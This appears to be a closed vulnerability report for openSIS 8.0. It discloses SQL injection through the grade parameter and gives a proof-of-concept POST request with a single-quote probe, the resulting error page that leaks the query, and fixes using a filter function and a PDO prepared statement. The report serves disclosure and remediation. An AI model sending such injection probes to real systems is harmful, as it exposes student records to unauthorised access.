Closed
Description
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can inject SQL through the Grade= parameter, which is handled in /opensis/functions/GetStuListFnc.php.

POC

REQUEST
POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='&section=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y

RESPONSE
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
<b>SQL:</b></TD>
<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT FROM students s ,student_enrollment ssm LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL) OR ssm.DROP_CODE=33 ) AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc' AND LOWER(s.ALT_ID) LIKE '123%' AND LOWER(s.LAST_NAME) LIKE 'ad%' AND LOWER(s.FIRST_NAME) LIKE 'ácd%' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
</TR>
[...]
SOLUTION
Run $_REQUEST['grade'] through sqlSecurityFilter() before the value is placed in the query.
The code should look like:
if ($_REQUEST['grade']) {
    // filter the raw request value before it gets anywhere near the SQL text
    $grade = sqlSecurityFilter($_REQUEST['grade']);
    // escape any remaining single quotes, then close the quoted literal and the subquery
    $allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=\'' . singleQuoteReplace("'", "\'", $grade) . '\')';
}
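As an added example (not code from the openSIS project), the same grade filter built with a PDO prepared statement: the value is bound separately from the SQL text, so the stray quote in the request above is data to the server rather than syntax, and no escaping function is needed. Table and column names come from the SQL shown in the error page; the $pdo connection and the buildGradeFilter name are assumptions.

```php
<?php
// Added example: parameterised version of the grade-level filter.
// Assumes an existing PDO connection in $pdo (MySQL/MariaDB), created with
// PDO::ATTR_EMULATE_PREPARES => false so the server itself prepares the statement.

/**
 * Appends the grade-level condition using a bound parameter instead of
 * concatenating the request value into the query string.
 *
 * @param string $sql    query text built so far
 * @param array  $params positional parameters collected so far (by reference)
 * @param string $grade  raw value of $_REQUEST['grade']
 * @return string        query text with the condition appended
 */
function buildGradeFilter(string $sql, array &$params, string $grade): string
{
    if ($grade === '') {
        return $sql;
    }
    // The placeholder is the only thing added to the SQL text; the driver
    // transmits the value separately, so a "'" in the input cannot break
    // out of the literal the way it does in the error page above.
    $sql .= ' AND ssm.GRADE_ID IN (SELECT id FROM school_gradelevels WHERE title = ?)';
    $params[] = $grade;
    return $sql;
}

// Usage with the report's request, where grade is a single quote character.
$params = [];
$sql = 'SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT'
     . ' FROM students s, student_enrollment ssm'
     . ' WHERE ssm.STUDENT_ID = s.STUDENT_ID';
$sql = buildGradeFilter($sql, $params, $_REQUEST['grade'] ?? '');

$stmt = $pdo->prepare($sql);   // $pdo: assumed existing PDO connection
$stmt->execute($params);       // with grade="'" this simply matches no grade level
$count = (int) $stmt->fetchColumn();
```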